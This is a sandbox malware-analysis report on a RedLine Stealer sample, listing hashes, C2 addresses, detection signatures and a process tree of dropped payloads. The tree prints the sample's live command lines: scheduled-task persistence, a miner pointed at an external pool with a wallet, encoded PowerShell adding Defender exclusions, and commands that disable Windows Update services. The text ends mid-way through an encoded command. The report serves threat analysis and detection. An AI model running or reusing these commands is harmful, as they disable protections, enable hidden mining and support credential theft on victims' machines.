redline | b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057

Analysis

max time kernel
84s
max time network
150s
platform
windows10-1703_x64
resource
win10-20220901-en
resource tags

arch:x64arch:x86image:win10-20220901-enlocale:en-usos:windows10-1703-x64system
submitted
13-11-2022 17:15

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe
Size

173KB
MD5

c87dcd21b0dcb51699a4735ac76ad3de
SHA1

87d3d0a8aca200fc85ac9646b710141a4098932b
SHA256

b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057
SHA512

bba293557550219edcb37d8fc88d366ff53164e6018beb20f4ecc4f72cc58afae0e8573449602b48a89db916b7643dd9b30d5767c37dcf0d8893cd57f9dfa8e8
SSDEEP

3072:C0lrFhKhmLqTNZZ/DRoz6bisK6XCE/gUumfWTa/7Oj:n7LqTNZF0AisKOVPA

Score

10^/10

redline 123 new1113 discovery evasion exploit infostealer spyware stealer upx

Malware Config

Extracted

Family

redline

Botnet

123

78.153.144.3:2510

Attributes

auth_value
cd6abb0af211bce081d7bf127cc26835

Extracted

Family

redline

Botnet

new1113

jalocliche.xyz:81

chardhesha.xyz:81

Attributes

auth_value
bce8d71b3146db7b78f06ec6ae28bdd9

Signatures

RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
infostealer redline

RedLine payload 7 IoCs

Processes:

resource	yara_rule
behavioral1/memory/4128-296-0x00000000024F0000-0x000000000252E000-memory.dmp	family_redline
behavioral1/memory/4128-310-0x0000000004B40000-0x0000000004B7C000-memory.dmp	family_redline
behavioral1/memory/4752-788-0x0000000004FD21CA-mapping.dmp	family_redline
behavioral1/memory/4752-825-0x0000000004FB0000-0x0000000004FD8000-memory.dmp	family_redline
behavioral1/memory/3860-1093-0x00000000002921AE-mapping.dmp	family_redline
behavioral1/memory/1096-1097-0x0000000000C20000-0x0000000000C59000-memory.dmp	family_redline
behavioral1/memory/1096-1120-0x0000000000C20000-0x0000000000C59000-memory.dmp	family_redline

Downloads MZ/PE file

Executes dropped EXE 9 IoCs

Processes:

918.exe1176.exeEAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe2126.exeLYKAA.exe26F4.exe3DF7.exeminer2.exe4376.exe

pid	process
1096	918.exe
3488	1176.exe
1324	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
752	2126.exe
508	LYKAA.exe
4128	26F4.exe
5040	3DF7.exe
5052	miner2.exe
1788	4376.exe

Possible privilege escalation attempt 2 IoCs
exploit

Processes:

takeown.exeicacls.exe

pid process

4968 takeown.exe
3868 icacls.exe
Stops running service(s) 3 TTPs
evasion

Modify Existing Service
T1031

Impair Defenses
T1562

Service Stop
T1489

pid	process
4968	takeown.exe
3868	icacls.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
behavioral1/memory/4112-909-0x0000000000400000-0x0000000000BEB000-memory.dmp	upx
behavioral1/memory/4112-920-0x0000000000400000-0x0000000000BEB000-memory.dmp	upx

Deletes itself 1 IoCs

Processes:

pid process

2952
Modifies file permissions 1 TTPs 2 IoCs
discovery

File Permissions Modification
T1222

Processes:

takeown.exeicacls.exe

pid process

4968 takeown.exe
3868 icacls.exe
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Uses the VBS compiler for execution 1 TTPs

Scripting
T1064
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Legitimate hosting services abused for malware hosting/C2 1 TTPs

Web Service
T1102
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

74 ip-api.com
Suspicious use of SetThreadContext 2 IoCs

Processes:

LYKAA.exe4376.exe

description pid process target process

PID 508 set thread context of 4808 508 LYKAA.exe vbc.exe
PID 1788 set thread context of 4752 1788 4376.exe vbc.exe
Launches sc.exe 5 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exesc.exesc.exesc.exesc.exe

pid process

4784 sc.exe
3416 sc.exe
4916 sc.exe
3080 sc.exe
3424 sc.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

pid	process
2952

pid	process
4968	takeown.exe
3868	icacls.exe

flow	ioc
74	ip-api.com

description	pid	process	target process
PID 508 set thread context of 4808	508	LYKAA.exe	vbc.exe
PID 1788 set thread context of 4752	1788	4376.exe	vbc.exe

pid	process
4784	sc.exe
3416	sc.exe
4916	sc.exe
3080	sc.exe
3424	sc.exe

Checks SCSI registry key(s) 3 TTPs 3 IoCs

SCSI information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

Processes:

b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe

description	ioc	process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe
Key queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe
Key enumerated	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI	b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe

Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task
T1053

Processes:

schtasks.exe

pid process

4928 schtasks.exe
Delays execution with timeout.exe 1 IoCs
evasion

Processes:

timeout.exe

pid process

4364 timeout.exe
GoLang User-Agent 1 IoCs
Uses default user-agent string defined by GoLang HTTP packages.

Processes:

description flow ioc

HTTP User-Agent header 81 Go-http-client/1.1
Modifies registry key 1 TTPs 9 IoCs

Modify Registry
T1112

Processes:

reg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exereg.exe

pid process

416 reg.exe
4060 reg.exe
1444 reg.exe
4208 reg.exe
4528 reg.exe
3376 reg.exe
2396 reg.exe
4716 reg.exe
2880 reg.exe

pid	process
4928	schtasks.exe

pid	process
4364	timeout.exe

description	flow	ioc
HTTP User-Agent header	81	Go-http-client/1.1

pid	process
416	reg.exe
4060	reg.exe
1444	reg.exe
4208	reg.exe
4528	reg.exe
3376	reg.exe
2396	reg.exe
4716	reg.exe
2880	reg.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe

pid	process
328	b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe
328	b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

Processes:

pid process

2952

pid	process
2952

Suspicious behavior: MapViewOfSection 19 IoCs

Processes:

b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe

pid	process
328	b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952
2952

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exeLYKAA.exe2126.exe26F4.exeminer2.exepowershell.exepowercfg.exepowercfg.exe

description	pid	process
Token: SeDebugPrivilege	1324	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeDebugPrivilege	508	LYKAA.exe
Token: SeDebugPrivilege	752	2126.exe
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeDebugPrivilege	4128	26F4.exe
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeDebugPrivilege	5052	miner2.exe
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeIncreaseQuotaPrivilege	2384	powershell.exe
Token: SeSecurityPrivilege	2384	powershell.exe
Token: SeTakeOwnershipPrivilege	2384	powershell.exe
Token: SeLoadDriverPrivilege	2384	powershell.exe
Token: SeSystemProfilePrivilege	2384	powershell.exe
Token: SeSystemtimePrivilege	2384	powershell.exe
Token: SeProfSingleProcessPrivilege	2384	powershell.exe
Token: SeIncBasePriorityPrivilege	2384	powershell.exe
Token: SeCreatePagefilePrivilege	2384	powershell.exe
Token: SeBackupPrivilege	2384	powershell.exe
Token: SeRestorePrivilege	2384	powershell.exe
Token: SeShutdownPrivilege	2384	powershell.exe
Token: SeDebugPrivilege	2384	powershell.exe
Token: SeSystemEnvironmentPrivilege	2384	powershell.exe
Token: SeRemoteShutdownPrivilege	2384	powershell.exe
Token: SeUndockPrivilege	2384	powershell.exe
Token: SeManageVolumePrivilege	2384	powershell.exe
Token: 33	2384	powershell.exe
Token: 34	2384	powershell.exe
Token: 35	2384	powershell.exe
Token: 36	2384	powershell.exe
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	2952
Token: SeCreatePagefilePrivilege	2952
Token: SeShutdownPrivilege	1872	powercfg.exe
Token: SeCreatePagefilePrivilege	1872	powercfg.exe
Token: SeShutdownPrivilege	4816	powercfg.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

1176.exeEAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.execmd.exeLYKAA.execmd.exe2126.exeminer2.exe

description	pid	process	target process
PID 2952 wrote to memory of 1096	2952		918.exe
PID 2952 wrote to memory of 1096	2952		918.exe
PID 2952 wrote to memory of 1096	2952		918.exe
PID 2952 wrote to memory of 3488	2952		1176.exe
PID 2952 wrote to memory of 3488	2952		1176.exe
PID 3488 wrote to memory of 1324	3488	1176.exe	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
PID 3488 wrote to memory of 1324	3488	1176.exe	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
PID 1324 wrote to memory of 4596	1324	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe	cmd.exe
PID 1324 wrote to memory of 4596	1324	EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe	cmd.exe
PID 4596 wrote to memory of 4364	4596	cmd.exe	timeout.exe
PID 4596 wrote to memory of 4364	4596	cmd.exe	timeout.exe
PID 2952 wrote to memory of 752	2952		2126.exe
PID 2952 wrote to memory of 752	2952		2126.exe
PID 2952 wrote to memory of 752	2952		2126.exe
PID 4596 wrote to memory of 508	4596	cmd.exe	LYKAA.exe
PID 4596 wrote to memory of 508	4596	cmd.exe	LYKAA.exe
PID 2952 wrote to memory of 4128	2952		26F4.exe
PID 2952 wrote to memory of 4128	2952		26F4.exe
PID 2952 wrote to memory of 4128	2952		26F4.exe
PID 508 wrote to memory of 4208	508	LYKAA.exe	cmd.exe
PID 508 wrote to memory of 4208	508	LYKAA.exe	cmd.exe
PID 4208 wrote to memory of 4928	4208	cmd.exe	schtasks.exe
PID 4208 wrote to memory of 4928	4208	cmd.exe	schtasks.exe
PID 2952 wrote to memory of 5040	2952		3DF7.exe
PID 2952 wrote to memory of 5040	2952		3DF7.exe
PID 752 wrote to memory of 5052	752	2126.exe	miner2.exe
PID 752 wrote to memory of 5052	752	2126.exe	miner2.exe
PID 2952 wrote to memory of 1788	2952		4376.exe
PID 2952 wrote to memory of 1788	2952		4376.exe
PID 2952 wrote to memory of 1788	2952		4376.exe
PID 2952 wrote to memory of 1112	2952		explorer.exe
PID 2952 wrote to memory of 1112	2952		explorer.exe
PID 2952 wrote to memory of 1112	2952		explorer.exe
PID 2952 wrote to memory of 1112	2952		explorer.exe
PID 2952 wrote to memory of 2268	2952		explorer.exe
PID 2952 wrote to memory of 2268	2952		explorer.exe
PID 2952 wrote to memory of 2268	2952		explorer.exe
PID 5052 wrote to memory of 2384	5052	miner2.exe	powershell.exe
PID 5052 wrote to memory of 2384	5052	miner2.exe	powershell.exe
PID 2952 wrote to memory of 1368	2952		explorer.exe
PID 2952 wrote to memory of 1368	2952		explorer.exe
PID 2952 wrote to memory of 1368	2952		explorer.exe
PID 2952 wrote to memory of 1368	2952		explorer.exe
PID 2952 wrote to memory of 3864	2952		explorer.exe
PID 2952 wrote to memory of 3864	2952		explorer.exe
PID 2952 wrote to memory of 3864	2952		explorer.exe
PID 2952 wrote to memory of 3348	2952		explorer.exe
PID 2952 wrote to memory of 3348	2952		explorer.exe
PID 2952 wrote to memory of 3348	2952		explorer.exe
PID 2952 wrote to memory of 3348	2952		explorer.exe
PID 2952 wrote to memory of 3692	2952		explorer.exe
PID 2952 wrote to memory of 3692	2952		explorer.exe
PID 2952 wrote to memory of 3692	2952		explorer.exe
PID 2952 wrote to memory of 3692	2952		explorer.exe
PID 2952 wrote to memory of 436	2952		explorer.exe
PID 2952 wrote to memory of 436	2952		explorer.exe
PID 2952 wrote to memory of 436	2952		explorer.exe
PID 2952 wrote to memory of 436	2952		explorer.exe
PID 2952 wrote to memory of 4076	2952		explorer.exe
PID 2952 wrote to memory of 4076	2952		explorer.exe
PID 2952 wrote to memory of 4076	2952		explorer.exe
PID 2952 wrote to memory of 4900	2952		explorer.exe
PID 2952 wrote to memory of 4900	2952		explorer.exe
PID 2952 wrote to memory of 4900	2952		explorer.exe

C:\Users\Admin\AppData\Local\Temp\b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe
"C:\Users\Admin\AppData\Local\Temp\b03621290fa3291de14fb80c3f8ca5f35f94c90f662f5f4af53d69e3176e3057.exe"
1⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:328

C:\Users\Admin\AppData\Local\Temp\918.exe
C:\Users\Admin\AppData\Local\Temp\918.exe
1⤵
- Executes dropped EXE
PID:1096

C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe"
2⤵
PID:3860

C:\Users\Admin\AppData\Local\Temp\1176.exe
C:\Users\Admin\AppData\Local\Temp\1176.exe
1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3488

C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe
"C:\Users\Admin\AppData\Roaming\EAEHCHcAAKSescACHUHCAAHKhACsKfCeCHhFCAHFAEehaheeHsAKhuh.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1324

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmp154D.tmp.bat""
3⤵
- Suspicious use of WriteProcessMemory
PID:4596

C:\Windows\system32\timeout.exe
timeout 3
4⤵
- Delays execution with timeout.exe
PID:4364

C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe
"C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
4⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:508

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
5⤵
- Suspicious use of WriteProcessMemory
PID:4208

C:\Windows\system32\schtasks.exe
schtasks /create /f /sc MINUTE /mo 5 /RL HIGHEST /tn "LYKAA" /tr "C:\ProgramData\GhubSoftWalletTrust\LYKAA.exe"
6⤵
- Creates scheduled task(s)
PID:4928

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\vbc.exe -a verus -o stratum+tcp://na.luckpool.net:3956 -u RKsS6XcgidDNc8rU38Yiv5STQutyMUu9A4.installs001 -p x -t 6
5⤵
PID:4808

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c cls
6⤵
PID:1684

C:\Users\Admin\AppData\Local\Temp\2126.exe
C:\Users\Admin\AppData\Local\Temp\2126.exe
1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:752

C:\Windows\Temp\miner2.exe
"C:\Windows\Temp\miner2.exe"
2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5052

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGUAZQAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGQAcABsAHUAIwA+ACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAGEAdABoACAAQAAoACQAZQBuAHYAOgBVAHMAZQByAFAAcgBvAGYAaQBsAGUALAAkAGUAbgB2ADoAUwB5AHMAdABlAG0ARAByAGkAdgBlACkAIAA8ACMAcQBpAGgAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAZgB6AHMAIwA+AA=="
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2384

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f & reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f & takeown /f %SystemRoot%\System32\WaaSMedicSvc.dll & icacls %SystemRoot%\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q & rename %SystemRoot%\System32\WaaSMedicSvc.dll WaaSMedicSvc_BAK.dll & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f & reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE & SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
3⤵
PID:4980

C:\Windows\system32\sc.exe
sc stop UsoSvc
4⤵
- Launches sc.exe
PID:3416

C:\Windows\system32\sc.exe
sc stop WaaSMedicSvc
4⤵
- Launches sc.exe
PID:4916

C:\Windows\system32\sc.exe
sc stop wuauserv
4⤵
- Launches sc.exe
PID:3080

C:\Windows\system32\sc.exe
sc stop bits
4⤵
- Launches sc.exe
PID:3424

C:\Windows\system32\sc.exe
sc stop dosvc
4⤵
- Launches sc.exe
PID:4784

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc /f
4⤵
- Modifies registry key
PID:4208

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc /f
4⤵
- Modifies registry key
PID:4528

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\wuauserv /f
4⤵
- Modifies registry key
PID:3376

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\bits /f
4⤵
- Modifies registry key
PID:2396

C:\Windows\system32\reg.exe
reg delete HKLM\SYSTEM\CurrentControlSet\Services\dosvc /f
4⤵
- Modifies registry key
PID:4716

C:\Windows\system32\takeown.exe
takeown /f C:\Windows\System32\WaaSMedicSvc.dll
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4968

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\WaaSMedicSvc.dll /grant *S-1-1-0:F /t /c /l /q
4⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:3868

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AUOptions /d 2 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:416

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v AutoInstallMinorUpdates /d 0 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:2880

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoUpdate /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:4060

C:\Windows\system32\reg.exe
reg add HKLM\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU /v NoAutoRebootWithLoggedOnUsers /d 1 /t REG_DWORD /f
4⤵
- Modifies registry key
PID:1444

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Automatic App Update" /DISABLE
4⤵
PID:4732

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\Scheduled Start" /DISABLE
4⤵
PID:3376

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sih" /DISABLE
4⤵
PID:4224

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\WindowsUpdate\sihboot" /DISABLE
4⤵
PID:5000

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistant" /DISABLE
4⤵
PID:1772

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantCalendarRun" /DISABLE
4⤵
PID:5108

C:\Windows\system32\schtasks.exe
SCHTASKS /Change /TN "\Microsoft\Windows\UpdateOrchestrator\UpdateAssistantWakeupRun" /DISABLE
4⤵
PID:4408

C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
3⤵
PID:600

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-ac 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:1872

C:\Windows\system32\powercfg.exe
powercfg /x -hibernate-timeout-dc 0
4⤵
- Suspicious use of AdjustPrivilegeToken
PID:4816

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-ac 0
4⤵
PID:3432

C:\Windows\system32\powercfg.exe
powercfg /x -standby-timeout-dc 0
4⤵
PID:4140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAHIAYgAjAD4AIABSAGUAZwBpAHMAdABlAHIALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrACAALQBBAGMAdABpAG8AbgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAEEAYwB0AGkAbwBuACAALQBFAHgAZQBjAHUAdABlACAAJwBwAG8AdwBlAHIAcwBoAGUAbABsACcAIAAtAEEAcgBnAHUAbQBlAG4AdAAgACcALQBFAG4AYwBvAGQAZQBkAEMAbwBtAG0AYQBuAGQAIAAiAFAAQQBBAGoAQQBHAFkAQQBkAEEAQQBqAEEARAA0AEEASQBBAEIAVABBAEgAUQBBAFkAUQBCAHkAQQBIAFEAQQBMAFEAQgBRAEEASABJAEEAYgB3AEIAagBBAEcAVQBBAGMAdwBCAHoAQQBDAEEAQQBMAFEAQgBHAEEARwBrAEEAYgBBAEIAbABBAEYAQQBBAFkAUQBCADAAQQBHAGcAQQBJAEEAQQBuAEEARQBNAEEATwBnAEIAYwBBAEYAQQBBAGMAZwBCAHYAQQBHAGMAQQBjAGcAQgBoAEEARwAwAEEASQBBAEIARwBBAEcAawBBAGIAQQBCAGwAQQBIAE0AQQBYAEEAQgBIAEEARwA4AEEAYgB3AEIAbgBBAEcAdwBBAFoAUQBCAGMAQQBFAE0AQQBhAEEAQgB5AEEARwA4AEEAYgBRAEIAbABBAEYAdwBBAGQAUQBCAHcAQQBHAFEAQQBZAFEAQgAwAEEARwBVAEEAYwBnAEEAdQBBAEcAVQBBAGUAQQBCAGwAQQBDAGMAQQBJAEEAQQB0AEEARgBZAEEAWgBRAEIAeQBBAEcASQBBAEkAQQBCAFMAQQBIAFUAQQBiAGcAQgBCAEEASABNAEEASQBBAEEAOABBAEMATQBBAGEAdwBCAHEAQQBIAGsAQQBJAHcAQQArAEEAQQA9AD0AIgAnACkAIAA8ACMAeABsACMAPgAgAC0AVAByAGkAZwBnAGUAcgAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFQAcgBpAGcAZwBlAHIAIAAtAEEAdABTAHQAYQByAHQAdQBwACkAIAA8ACMAZwBsAHAAbwAjAD4AIAAtAFMAZQB0AHQAaQBuAGcAcwAgACgATgBlAHcALQBTAGMAaABlAGQAdQBsAGUAZABUAGEAcwBrAFMAZQB0AHQAaQBuAGcAcwBTAGUAdAAgAC0AQQBsAGwAbwB3AFMAdABhAHIAdABJAGYATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAGkAcwBhAGwAbABvAHcASABhAHIAZABUAGUAcgBtAGkAbgBhAHQAZQAgAC0ARABvAG4AdABTAHQAbwBwAEkAZgBHAG8AaQBuAGcATwBuAEIAYQB0AHQAZQByAGkAZQBzACAALQBEAG8AbgB0AFMAdABvAHAATwBuAEkAZABsAGUARQBuAGQAIAAtAEUAeABlAGMAdQB0AGkAbwBuAFQAaQBtAGUATABpAG0AaQB0ACAAKABOAGUAdwAtAFQAaQBtAGUAUwBwAGEAbgAgAC0ARABhAHkAcwAgADEAMAAwADAAKQApACAAPAAjAGgAeQBjAGgAIwA+ACAALQBUAGEAcwBrAE4AYQBtAGUAIAAnAEcAbwBvAGcAbABlAFUAcABkAGEAdABlAFQAYQBzAGsATQBhAGMAaABpAG4AZQBRAEMAJwAgAC0AVQBzAGUAcgAgACcAUwB5AHMAdABlAG0AJwAgAC0AUgB1AG4ATABlAHYAZQBsACAAJwBIAGkAZwBoAGUAcwB0ACcAIAAtAEYAbwByAGMAZQAgADwAIwBiAHYAawBjACMAPgA7ACAAQwBvAHAAeQAtAEkAdABlAG0AIAAnAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwAbQBpAG4AZQByADIALgBlAHgAZQAnACAALQBEAGUAcwB0AGkAbgBhAHQAaQBvAG4AIAAnAEMAOgBcAFA